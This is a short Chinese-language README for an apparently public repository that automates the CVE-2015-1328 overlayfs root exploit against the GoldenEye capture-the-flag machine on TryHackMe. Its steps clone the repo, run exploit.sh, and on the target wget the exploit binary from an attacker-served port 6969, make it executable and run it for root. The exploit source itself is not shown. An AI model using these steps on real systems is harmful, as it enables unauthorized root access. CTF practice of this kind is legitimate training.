Linux 内核(即 Linux 内核包)中 overlayfs 实现在 Ubuntu 15.04 及之前版本中,版本低于 3.19.0-21.21 时未能正确检查上层文件系统目录中的文件创建权限,这使得本地用户能够通过在任意挂载命名空间中允许 overlayfs 的配置来获取 root 访问权限。
感谢 rebel
这是一个针对 TryHackMe 中 GoldenEye CTF 的 CVE-2015-1328 自动化漏洞利用。默认情况下,该机器未安装 gcc,因此我将 gcc 配置为 cc,并相应运行漏洞利用以获取 root 权限。
安装
只需克隆此仓库——
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<目标 IP>:6969/exploit
$ chmod +x exploit
$ ./exploit